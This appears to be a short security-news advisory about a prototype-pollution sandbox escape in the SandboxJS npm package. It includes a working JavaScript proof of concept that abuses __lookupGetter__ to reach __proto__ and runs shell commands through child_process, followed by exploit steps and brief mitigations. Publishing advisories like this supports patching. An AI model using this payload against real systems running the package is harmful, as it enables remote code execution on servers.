Listen to this Post
SandboxJS implements prototype chain validation in `executor.ts` LispType.Prop operation (lines 368-398). It correctly restricts access to the root Object.prototype. However, when accessing a property on a function object (e.g., Object.toString.__lookupGetter__), the `prototypeAccess` check uses isFunction = true. The subsequent `isFunction` branch only validates against a prototype whitelist for a.prototype, failing to check if the accessed property itself (like __lookupGetter__) originates from a forbidden prototype up the function object’s own chain. This allows an attacker to retrieve the `__lookupGetter__` method, which is then used to access `__proto__` of other objects, bypassing sandbox restrictions to pollute prototypes and achieve Remote Code Execution.
Platform: SandboxJS
Version: < f212a38
Vulnerability : Prototype Pollution
Severity: Critical
date: N/A
Prediction: 2026-02-17
What Undercode Say:
npm list @nyariv/sandboxjs
// Proof of Concept
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`
sb.compile(payload)().run();
How Exploit:
1. Access `__lookupGetter__` via function object.
2. Use it to obtain `__proto__` accessor.
3. Pollute `Map` prototype.
4. Execute arbitrary shell commands.
Protection from this CVE:
Update SandboxJS.
Disable `__lookupGetter__`.
Stricter function property checks.
Impact:
Critical RCE
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

